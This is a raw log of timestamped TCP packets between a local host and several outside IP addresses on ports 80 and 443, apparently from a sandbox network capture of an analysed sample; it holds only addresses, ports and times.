Jan 11, 2025 08:11:15.583511114 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.583569050 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.583610058 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.583622932 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.583648920 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.583656073 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.583667994 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.583672047 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.583682060 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.583693981 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.583695889 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.583713055 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.583756924 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.616561890 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616575956 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616588116 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616599083 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616610050 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616621017 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616638899 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616640091 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.616648912 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616661072 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616677999 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616688967 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616688967 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.616698980 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616700888 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.616710901 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616720915 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616731882 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.616735935 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.616766930 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.648446083 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648458958 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648511887 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.648601055 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648612022 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648622990 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648636103 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648644924 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.648647070 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648664951 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.648694992 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.648747921 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648761988 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648773909 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648783922 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648792028 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.648823977 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.648881912 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648929119 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648960114 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.648968935 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649017096 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649070978 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649084091 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649095058 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649106026 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649118900 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649122000 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649167061 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649183989 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649219036 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649234056 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649271965 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649301052 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649312973 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649333954 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649343967 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649353981 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649379015 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649384975 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649391890 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649415016 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649431944 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649476051 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649487972 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649499893 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649511099 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649522066 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649523973 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649549961 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649561882 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649570942 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649581909 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649591923 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649600983 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649610996 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649632931 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649782896 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649801016 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649812937 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649830103 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649842978 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649852991 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649852991 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649864912 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649869919 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649874926 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.649888039 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.649938107 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650054932 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650065899 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650079012 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650089979 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650095940 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650132895 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650154114 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650166035 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650176048 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650193930 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650194883 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650207043 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650213003 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650218010 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650247097 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650258064 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650322914 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650333881 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650353909 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650361061 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650367022 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650372982 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650378942 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650391102 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650396109 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650403023 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650408983 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650420904 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650434017 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650437117 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650444984 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.650460005 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.650492907 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653366089 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653378963 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653388977 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653424025 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653428078 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653435946 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653445959 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653448105 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653459072 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653471947 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653481960 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653492928 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653493881 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653502941 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653534889 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653651953 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653664112 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653676033 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653693914 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653703928 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653708935 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653708935 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653745890 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.653950930 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653968096 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653986931 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.653991938 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654005051 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654020071 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654021978 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654031038 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654043913 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654047966 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654055119 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654067039 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654073000 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654103994 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654278040 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654289961 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654301882 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654325008 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654344082 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654349089 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654356003 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654372931 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654385090 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654390097 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654397011 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654402018 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654407978 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.654431105 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.654489040 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.674233913 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.674247980 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.674261093 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.674272060 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.674283028 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.674297094 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.674349070 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:17.532165051 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:17.532217026 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:17.532293081 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:17.533432961 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:17.533448935 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.196073055 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.196161032 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.197964907 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.197987080 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.198832035 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.238818884 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.243901014 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.287338972 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.701570988 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.701598883 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.701652050 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.701674938 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.701689005 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.701709986 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.701715946 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.701735020 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.701764107 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.798239946 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.798274040 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.798430920 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.798460007 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.801049948 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.803416014 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.803486109 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.807986975 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.808078051 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.808101892 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.808196068 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.820182085 CET	49749	443	192.168.2.10	104.102.49.254
Jan 11, 2025 08:11:18.820229053 CET	443	49749	104.102.49.254	192.168.2.10
Jan 11, 2025 08:11:18.869097948 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:18.869160891 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:18.869246960 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:18.869586945 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:18.869601965 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.357594013 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.357723951 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.359694004 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.359711885 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.360060930 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.361238003 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.361335039 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.361376047 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.878084898 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.878197908 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.878245115 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.879148960 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.879169941 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.879175901 CET	49757	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.879189968 CET	443	49757	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.925115108 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.925158024 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:19.925261974 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.925638914 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:19.925652027 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.407375097 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:20.407449961 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:20.409902096 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.410095930 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.411497116 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.411509037 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.411752939 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.413351059 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.413351059 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.413424969 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901422977 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901480913 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901516914 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901550055 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901576996 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901597977 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.901597977 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.901623011 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901673079 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901706934 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.901722908 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.901819944 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.901951075 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.906162977 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.906193972 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.906222105 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.906234980 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.906244993 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.906318903 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.957634926 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.993613958 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.993745089 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.993779898 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.993824959 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.993839025 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.993880033 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.993931055 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.993931055 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.994342089 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.994354963 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:20.994437933 CET	49766	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:20.994443893 CET	443	49766	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:21.611084938 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:21.611123085 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:21.611208916 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:21.612023115 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:21.612037897 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:22.087341070 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:22.087445021 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:22.088794947 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:22.088813066 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:22.089063883 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:22.090255022 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:22.090939045 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:22.090976954 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:25.393810987 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:25.393923998 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:25.394083023 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:25.394454956 CET	49777	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:25.394471884 CET	443	49777	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:25.610256910 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:25.610270023 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:25.610549927 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:25.610961914 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:25.610975981 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:26.093758106 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:26.093839884 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:26.095334053 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:26.095340967 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:26.095621109 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:26.097071886 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:26.097110987 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:26.097165108 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:26.098216057 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:26.098222017 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:37.806327105 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:37.806411028 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:37.806493044 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:37.806617975 CET	49803	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:37.806629896 CET	443	49803	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:38.372339964 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.372370958 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:38.372880936 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.373423100 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.373440027 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:38.849348068 CET	443	49887	104.21.96.1	192.168.2.10
